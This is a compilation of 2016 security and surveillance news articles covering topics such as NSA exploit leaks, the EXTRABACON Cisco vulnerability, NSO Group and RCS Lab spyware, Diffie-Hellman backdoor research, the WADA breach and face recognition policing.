The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
The unsupervised use of face recognition systems on a regular basis threatens the privacy and civil liberties of Millions, especially immigrants and people of color, according to the dozens of signatories.
For in-depth information, you can head on to the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."


Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers

The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, here's what GCHQ Director, Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe take part in the challenge; only 30,000 had made it reach the final stage, but three people came very close, who were considered winners by the GCHQ.
However, the solution to the Christmas puzzle, including explanations from the puzzle-setters, was publicly made available early this year for anyone to have a look.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."


Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews  BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: Only a few prime numbers were commonly used by 92 percent of the top 1 Million Alexa HTTPS domains that might have fit well within the NSA's $11 Billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generates ephemeral keys using groups of large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm does not contain any backdoor itself, but it has been intentionally weakened in an undetectable way by hiding the fact how various applications generate prime numbers.
Additionally, the size of keys (i.e. less than or equals to 1024-bit) chosen to be used in the Diffie-Hellman algorithm also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. randomly selecting large prime number but from a predefined group, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who are aware of the fact how prime numbers are being generated for trapdoor function and looking to decrypt 1024-bit secured communications can unscramble the discrete logarithm in order to decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
Researchers also estimate that conducting similar computations for 2048-bit keys, even with backdoored prime numbers, would be 16 Million times harder in comparison to 1024-bit keys and will remain infeasible for many upcoming years.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, the 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites use 1024-bit keys as of last month, which can be broken by nation-sponsored adversaries or intelligence agencies like NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future, all standardized prime numbers should be published together with their seeds.
The concept of backdooring primes used in the Diffie-Hellman key exchange algorithm is almost similar to the one discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, Snowden leaks revealed that RSA received $10 Million bribe from the NSA to implement their flawed cryptographic algorithm Dual_EC_DRBG in its bSafe Security tool as a default protocol in its products to keep encryption weak.
So, it is not at all surprising if the NSA would be using these undetectable and weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.


Leaked NSA Hacking Tools Were 'Mistakenly' Left By An Agent On A Remote Server
23.9.2016 thehackernews BigBrothers
NSA's private zero-day exploits, malware and hacking tools
If you are a hacker, you might have enjoyed the NSA's private zero-day exploits, malware and hacking tools that were leaked last month.
But the question is: How these hacking tools ended up into the hands of hackers?
It has been found that the NSA itself was not directly hacked, but a former NSA employee carelessly left those hacking tools on a remote server three years ago after an operation and a group of Russian hackers found them, sources close to the investigation told Reuters.
The leaked hacking tools, which enable hackers to exploit vulnerabilities in systems from big vendors like Cisco Systems, Juniper, and Fortinet, were dumped publicly online by the group calling itself "The Shadow Brokers."
NSA officials have also admitted to the FBI that their careless employee acknowledged the error shortly afterward, and hence the agency was aware of its operative's mistake from last three years.
But instead of warning the affected companies that their customers were at risk, the NSA maintained the silence.
"After the discovery, the NSA tuned its sensors to detect [the] use of any of the tools by other parties, especially foreign adversaries with strong cyber espionage operations, such as China and Russia," Reuters reports.
Well, that's Bullshit! If they call it a 'tactic.'
Shortly after the public release of NSA cyber weapons, firewall vendors Cisco and Fortinet confirmed that the leaked zero-day vulnerabilities were legitimate and issued out patches to fix those exploits.
We are still waiting for the comments from the NSA, the FBI and the Office of the Director of National Intelligence about the matter.
Since the initial leak of NSA's hacking tools last month and confirmation of the leaked vulnerabilities being legitimate by Cisco and Fortinet, the intelligence agency and online community has been finding out the working exploits in the data dump that are still unknown and used in the wild.
Just recently, Cisco revealed a new zero-day vulnerability from the leaked data dump that had been used by hackers to target some of its customers, which indicates that hackers would likely continue to take advantage of the now-exposed exploits to conduct cyber attacks.


Sports doping agency WADA confirms attack by Russian cyber spies
14.9.2016 securityaffairs BigBrothers

World Anti-Doping Agency (WADA) confirms that Russian hackers breached its Anti-Doping Administration and Management System (ADAMS) database.
Hackers breached the World Anti-Doping Agency (WADA) and have stolen Olympic athletes’ medical records, the hack was confirmed by the agency. According to the WADA, the hackers accessed the Anti-Doping Administration and Management System (ADAMS) database, security experts speculate the involvement of the “Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear.”

The hackers obtained the access to the system by stealing credentials through a spear phishing attack against an “International Olympic Committee (IOC)-created account for the Rio 2016 Games.”

Hackers exploited the attention on the Olympic Games in order to trick the victims with a classic social engineering attack.

“The World Anti-Doping Agency (WADA) confirms that a Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear, illegally gained access to WADA’s Anti-Doping Administration and Management System (ADAMS) database via an International Olympic Committee (IOC)-created account for the Rio 2016 Games. The group accessed athlete data, including confidential medical data — such as Therapeutic Use Exemptions delivered by International Sports Federations (IFs) and National Anti-Doping Organizations (NADOs) — related to the Rio Games; and, subsequently released some of the data in the public domain, accompanied by the threat that they will release more.” reads the statement issued by the WADA that regrets the cyber attack.

Segui
WADA ✔ @wada_ama
WADA Confirms Attack by Russian Cyber Espionage Group: http://ow.ly/gYik304aJxX
17:47 - 13 Set 2016 · Canada, Canada
265 265 Retweet 80 80 Mi piace
The hackers have released files claiming that top US athletes were authorized by the WADA to take performance-enhancing substances, the WADA agency, the atletes and the federations have denied the circumstance.

sports federations and athletes themselves have gone public to deny any wrongdoing.
The Fancy Bear published the announcement of the data breach and the related file on a website using their name. (Be careful before visiting the site, Fancy Bear is one of the most dangerous APT that in several attacks leveraged on zero-day exploits). Below the message published by the group on the site that also included medical records of the athlete.

“Greetings citizens of the world. Allow us to introduce ourselves… We are Fancy Bears’ international hack team. We stand for fair play and clean sport.

We announce the start of #OpOlympics. We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”

“We will start with the U.S. team which has disgraced its name by tainted victories. We will also disclose exclusive information about other national Olympic teams later. Wait for sensational proof of famous athletes taking doping substances any time soon.”

Serena Williams, for example, was allowed to take oxycodone, hydromorphone, prednisone and methylprednisolone in 2010, 2014 and 2015, despite the substances are banned by the WADA.

According to RT.com, Williams was allowed also to take some of other drugs by Dr. Stuart Miller from the International Tennis Federation (ITF).

wada-data-breach

The WADA director general Olivier Niggli confirmed the involvement of Russian hackers in the statement issued by the agency.

“WADA condemns these ongoing cyber-attacks that are being carried out in an attempt to undermine WADA and the global anti-doping system,” said Niggli. “WADA has been informed by law enforcement authorities that these attacks are originating out of Russia,” he continued. “Let it be known that these criminal acts are greatly compromising the effort by the global anti-doping community to re-establish trust in Russia further to the outcomes of the Agency’s independent McLaren Investigation Report,” Niggli continued.

According to the experts, the hackers hit the WADA agency in response to accusations of government-sponsored doping for Russian athletics, some of them were even banned from the Olympic Games this summer.

Stay Tuned …


Motherboard shows us how surveillance software works
13.9.2016 securityaffairs BigBrothers

Surveillance is a profitable business, Motherboard has published a never-before-seen 10-minute video showing a live demo of a surveillance software.
Recently, the iPhone hack carried out with the NSO Group‘s Pegasus raised the debate about the use of surveillance software. Who uses them? How? Are we able to defend our machines from a so invasive surveillance?

NSO Group is just one company in a profitable market, to give you an idea of it I invite you to give a look to the Transparency Toolkit, a project that gathers open data on surveillance and human rights abuses and makes free software to examine them. The official page of the project includes tools and case studies.

Hacking Team, Gamma International, NSO Group, Blue Coat, and Verint are only the first names of surveillance firms that passed in my mind while I’m writing this post, but the list is very long.

These firms design solutions that are used by law enforcement and intelligence agencies during their investigations. The expensive solutions proposed by the surveillance firms allows to spy on computers and smartphones, unfortunately, their abuses in the wild are very common. Many governments used them in the past to track dissidents and oppositions, in many cases the use of surveillance solutions represented a severe violation of human rights.

Despite we can read thousands of good posts on the topic, it isn’t so easy to see a live demo of surveillance systems, but the popular journalist Lorenzo Bicchierai has published an interesting post on Motherboard with the intent to show us how government spyware infects a computer.

“Motherboard has obtained a never-before-seen 10-minute video showing a live demo for a spyware solution made by a little known Italian surveillance contractor called RCS Lab. Unlike Hacking Team, RCS Lab has been able to fly under the radar for years, and very little is known about its products, or its customers.” wrote Bicchierai.

Motherboard published a video related to a live demo presented by an expert from the Italian surveillance firm RCS Lab. The video shows how the company’s spyware Mito3 could be used to spy on an unaware suspect.

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s spyware Mito3 allows attackers to launch MiTM attacks against the victims injecting malicious content in the connection to any website he intends to visit. The software is very easy to use as explained in the post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video.”reported MotherBoard.”

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s spyware Mito3 allows attackers to launch MiTM attacks against the victims injecting malicious content in the connection to any website he intends to visit. The software is very easy to use as explained int he post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video.”reported MotherBoard.”

surveillance software live-demo

In the video the RCS employee chooses the mirc.com website (IRC chat client) as attack vector then inject with malware in order to compromise the target machine. When the victim visits the mirc.com website, it displays a fake Adobe Flash update installer pops up that is created by the surveillance software by injecting the malicious code. The user is urged to click install in order to proceed the navigation on the website, allowing the surveillance spyware to infect his machine.

I wish to thank Motherboard and Lorenzo Bicchierai for their post that gives us more information on surveillance practices.


NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers

Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group hacked into the arsenal of the NSA-Linked Equation Group leaked online data dumps containing its exploits.

ExtraBacon is one of the exploits included in the NSA arsenal, in August security experts have improved it to hack newer version of CISCO ASA appliance. The Hungary-based security consultancy SilentSignal has focused his analysis on the ExtraBacon exploit revealing that it could be used against the newer models of Cisco’s Adaptive Security Appliance (ASA).

The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA boxes and has now been expanded to 9.2.(4).

CISCO ASA Software 2

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The EXTRABACON tool leverages on a flaw that resides in the Simple Network Management Protocol (SNMP) implemented by the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.

Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).

Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.

The bad news

Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliance are still vulnerable to the EXTRABACON attack judging by the time of the last reboot.

The security duo scanned roughly 50,000 ASA devices that were identified in a previous reconnaissance and analysed the last time reboot times.

Some 10,000 of the 38,000 ASA boxes had rebooted within the 15 days since Cisco released its patch, an information that confirms that roughly 28,000 devices are still vulnerable because they were not patched. The remaining 12,000 devices did not provide the information of the last reboot.

Going deep into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency and a financial services company, and a large Japanese telecommunications provider.

Extrabacon still vulnerable organizations

What does it means?

It means that the above organizations are using vulnerable CISCO ASA Boxes if the following condition are matched:

the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it’s rare to see it working that way) and know the SNMP community string
an attacker must also have telnet or SSH access to the devices
Of course, the exploiting of ExtraBacon is not so simple, anyway, it is possible when dealing with persistent attackers.

“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.

“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”

“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”

The security duo is warning the above organisations which could not underestimate the risk of exposure to EXTRABACON attacks.


NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers

The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for any Government to spy on mobile users, recently we have discussed the Trident vulnerabilities that were exploited by a surveillance software developed by the NSO Group to deliver the Pegasus malware.

But it could be very expensive if you decide to use the NSO Group’s software, according to The New York Times spy on 10 iPhones will cost $650,000, plus a $500,000 setup fee.

“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”

There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.

NSO Group

“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”

The New York Times has conducted further investigations on the NSO Group, the company that specializes its offer in surveillance applications for governments and law enforcement agencies around the world.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organization and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

Companies like the NSO Group operate in the dark, in a sort of “legal gray area,” despite the Israeli government exercises strict control of the export of such kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.

The principal product of the NSO Group is a surveillance software called Pegasus, it allows to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.

Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”


Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data

3.9.2016 securityaffairs BigBrothers

Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.

The data breach exposed the Internal resources of the Security Service (SNS) that are involved in the process of updating information about passports of foreign passports.

The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.

The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of Armenian national security ministry.

“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.

Armenia and Azerbaijan are neighbouring countries that engaged a war over the disputed Nagorno-Karabakh region between 1988 and 1994.

There is a great tension between the two countries, in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, but the battle caused the death of 350 people.

Azerbaijani Anti-Armenia Team
A source that has spoken to El Reg on condition of anonymity told to El Reg the leaked information is more likely to have come from an insider, excluding that the alleged Anti–Armenia team has hacked on Armenian government systems.

“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told el Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”


China Launches World's 1st 'Hack-Proof' Quantum Communication Satellite
16.8.2016 thehackernews BigBrothers
China has taken one more step forward towards achieving success in Quantum communication technology.
China has launched the world's first quantum communications satellite into orbit aboard a Long March-2D rocket earlier today in order to test the fundamental laws of quantum mechanics at space.
'Hack-Proof' Communications System
The satellite, dubbed Quantum Science Satellite, is designed to develop a 'Hack-Proof' communications system in this age of global electronic surveillance and cyber attacks by transmitting uncrackable encryption keys from space to the ground.
The 600-plus-kilogram Quantum Science Satellite, better known as Quantum Experiments at Space Scale (QUESS) satellite, took off from the Jiuquan Satellite Launch Center in Gobi Desert at 1:40 AM local time on a 2-year mission on Tuesday.
The QUESS satellite will help China perform unprecedented levels of experiments in quantum communication by sending entangled photons from the satellite to relay stations in China and Europe, which is separated by about 1,200 kilometers (746 miles).
The pioneering experiment is to test if the spooky property of quantum entanglement can work at long distances as well.
The satellite's payloads include:
Quantum key communicator
Quantum entanglement emitter
Quantum entanglement source
Quantum experiment controller
Processor
Laser communicator
The payloads, designed to operate for two years, were developed by the National Space Science Center in Beijing under the Chinese Academy of Sciences.
The QUESS satellite will also test the possibilities of communication via quantum 'teleportation,' using an entangled pair of photons.
If the satellite is able to successfully transmit quantum information securely between two ground stations, it could have huge implications for encryption and cryptography.
China has largely been ambitious to realize the importance of Quantum technology. From past two decades, Quantum technology has been a top strategic focus in the country's 5-year economic development plan.
While the United States invested about $200 Million a year in quantum research, China spent $101 Billion in quantum physics in 2015, up from $1.9 Billion in 2005.
China Invests Billions of Dollars in Quantum Technology
Quantum communication encryption is secure against any kind of interception because information is encoded in a quantum particle in such a way that it will be destroyed as soon as the system detects any intrusion attempts.
For example, when two people share an encrypted quantum message and a third person intercepts it, the message will change in an unpredictable way.
Quantum researchers have recently experimented the use of photons to successfully communicate securely over short distances on earth.
But if successful, the QUESS satellite would vastly expand the range of unhackable communication to long distances as well.
"The newly-launched satellite marks a transition in China's role - from a follower in classic information technology development to one of the leaders guiding future achievements," Pan Jianwei, the scientist who is leading the project, told the official Xinhua news agency.
If successful, the QUESS satellite would be the world's first transcontinental quantum key distribution network of its kind and China hopes to erect a global quantum communications network in 2030.
"If China is going to send more quantum communication satellites into orbit, we can expect a global network of quantum communications to be set up around 2030," Pan added.


FBI 'Double Agent' Pleads Guilty to Selling 'Classified Information' to China
2.8.2016 Zdroj: thehackernews.com BigBrothers
An FBI electronics technician has pleaded guilty to acting as a Chinese secret agent and passing along sensitive information about the Feds to a Chinese government official.
Kun Shan "Joey" Chun, 46, admitted in federal court in Manhattan on Monday that he violated his security clearance on several occasions between 2011 and 2016 in an effort to pass on secret information to China in exchange for money.
Chun is a 19-year FBI veteran from Brooklyn who was born in China but was employed by the FBI in 1997. His duties with the FBI included "accessing sensitive and, in some instance, classified information."
The g-man, as a double agent, sent confidential government information – including the identity and travel plans of an FBI special agent, the internal structure of the FBI and spying technology used by the Bureau – to a Chinese official.
Chun, who was initially arrested in March, got a top secret security clearance in 1998, at the time he did not reveal he had ties to China.
A court document unsealed on Monday stated Chun had built relationships with associates in China since 2006 and had ties to China-based Zhuhai Kolion Technology Company and one individual who described himself as a Chinese government official.
Chun acted as a double agent – working both for the FBI and China – and began passing sensitive information to the Chinese official between 2011 and 2016.
In addition, Chun had long-standing and illegal ties to China-based Zhuhai Kolion Technology Company, for which he did research and consulting work, including collecting information about flash drive tech.
In exchange for his research, Chun was paid-for vacations and nights with prostitutes by Zhuhai Kolion Technology, and his parents were given money, officials said.
Preet Bharara, Manhattan’s top prosecutor, said the crime "betrays our nation and threatens our security. When the perpetrator is an FBI employee, like Kun Shan Chun, the threat is all the more serious and the betrayal all the more duplicitous."
Chun was caught by a fellow FBI undercover agent, who posed as a contractor for the Department of Defense (DoD) in a 2015 sting operation.
The techie fell for the trap and recruited the agent to pass on "sensitive information to his Chinese associates," in exchange for a cut of any profits.
The maximum sentence for Chun's criminal charge is ten years behind bars. He was released on bail following the court hearing. He is scheduled to be sentenced on 2 December.


Telephone metadata by NSA can reveal deeply personal information
20.5.2016 BigBrothers

A study conducted by the NSA confirms that telephone metadata from phone logs reveals individuals’ Personal Information to government surveillance agencies.
It has been argued in the past that the mass collection of phone records by government surveillance agencies poses a significant threat to privacy rights. Now, however, a new study confirms what privacy advocates have been arguing for years. This is according to US researchers who used basic phone logs and were able to identify individuals and access their confidential information.

All of these personal details were derived from anonymous “metadata” found on individuals’ calls and texts. The two scientists at Stanford University who conducted the research were able to figure out individuals’ names, where they lived and association information.

But that’s not all they found.

They also uncovered details such as gun ownership, medical and disability information and activities involving recreational drugs.When the results were paired with public information already available on services such as Yelp, Google and Facebook, a much bigger, more detailed picture of a given individual’s life can be seen.

Former general counsel at the US National Security Agency (NSA), Stewart Baker has said that, “metadata absolutely tells you everything about somebody’s life.”

“For the study, the researchers signed up 823 people who agreed to have metadata collected from their phones through an Android app. The app also received information from their Facebook accounts, which the scientists used to check the accuracy of their results. In all, the researchers gathered metadata on more than 250,000 calls and over 1.2m texts.” read an article published by the The Guardian.

“Analysts who logged into the NSA’s metadata gathering system were initially allowed to examine data up to three hops away from an individual. A call from the target individual’s phone to another number was one hop. From that phone to another was two hops. And so on. The records available to analysts stretched back for five years. The collection window has now been restricted to two hops and 18 months at most.”

Alarmingly, the Stanford study revealed that given just one phone number to start with, the NSA program would have access to telephone metadata for tens of millions of people. With restrictions in place, however, the number plummets–but still indicates that armed with just one phone number, it is possible to retrieve metadata on 25,000 people.

Telephone metadata NSA

Patrick Mutchler, a computer security researcher at Stanford, writing in the journal Proceedings of the National Academy of Sciences, goes over some key points:

A wealth of personal information was disclosed, some of it sensitive, about people who took part in the study.
“Through automatic and manual searches, they identified 82% of people’s names.”
This same technique revealed the names of businesses those individuals had contacted.
When plotted on a map, clusters of local businesses appeared, which the scientists predicted would be located near the given individuals’ home addresses.
“In this way, they named the city people lived in 57% of the time, and were nearly 90% accurate in placing people within 50 miles of their home.”
The scientists were eventually able to determine relationships based on analyzing individuals’ call patterns. Following that, they “gathered details on calls made to and from a list of organisations, including hospitals, pharmacies, religious groups, legal services, firearms retailers and repair firms, marijuana dispensaries, and sex establishments. From these, they pieced together some extraordinary vignettes from people’s lives.”

Mutchler hopes these findings will give legislators pause in regard to to authorizing mass surveillance programs: “Large-scale metadata surveillance programs, like the NSA’s, will necessarily expose highly confidential information about ordinary citizens,” he wrote. Mutchler went on to write: “To strike an appropriate balance between national security and civil liberties, future policymaking must be informed by input from relevant sciences.”

Similarly, Ross Anderson, professor of security engineering at Cambridge University argues that the study presents data that discussions can now be based on, saying: “With the right analytics running over nation-scale comms data you can infer huge amounts of sensitive information on everyone. We always suspected that of course, but here’s the data.”


Twitter closes the access to the Intel Agencies to Analysis Service
10.5.2016 BigBrothers

Twitter has blocked the US intelligence agencies from accessing a service that allows the real-time analysis of the content posted online.
According to The Wall Street Journal, that cited a senior US intelligence official, Twitter has blocked US intelligence agencies from accessing a service that analyzes the content posted online through the social media platform in real time.

“Twitter Inc. cut off U.S. intelligence agencies from access to a service that sifts through the entire output of its social-media postings, the latest example of tension between Silicon Valley and the federal government over terrorism and privacy.” states the The Wall Street Journal.

The social media giant owns about a five percent stake in Dataminr which is the unique service allowed to access the real-time stream of public tweets.

Twitter is banning third-party companies from selling data to intelligence agencies for surveillance. After a pilot programme conducted by In-Q-Tel now ended, the company told Dataminr that it will stop providing the service to the US Government. Dataminr has a $225,000 contract to provide its service to the Department of Homeland Security.

Dataminr implements a real time engine for the analysis of Tweets and the discovery of patterns among the content published online through the social media platform. This kind of information is precious in the analysis of any kind of threat actors and event, especially for investigations of terrorist organizations.

Twitter's IPO Filing Implies $12.8 Billion Value Amid Growth

The decision was not publicly announced by Twitter, but recently executives at Dataminr confirmed the Twitter’s intention to stop providing the service to the intelligence agencies.

“data is largely public and the US government may review public accounts on its own, like any user could.” Twitter told The Wall Street Journal in a statement-

“Dataminr uses public Tweets to sell breaking news alerts to media organizations such as CNN and government agencies such as the World Health Organization, for non-surveillance purposes,” Twitter told IBTimes UK. “We have never authorized Dataminr or any third party to sell data to a government or intelligence agency for surveillance purposes. This is a longstanding policy, not a new development.”

What will happen in the future? Dataminr will continue to provide its services to the financial industry, news media and other clients outside the intelligence

Dataminr will continue offering its services to its clients outside the intelligence community.

Part of the security community believe that the Twitter’s decision is aligned with current policies of IT giants that intend to protect users’ privacy avoiding the interference of the intelligence agencies.

Right? Wrong? … posterity will judge.


2015 intelligence transparency report, the surveillance is still nosey

9.5.2016 BigBrothers

According to 2015 intelligence transparency report, the searches of US citizens made by the NSA and CIA intelligence agencies have almost doubled since 2013
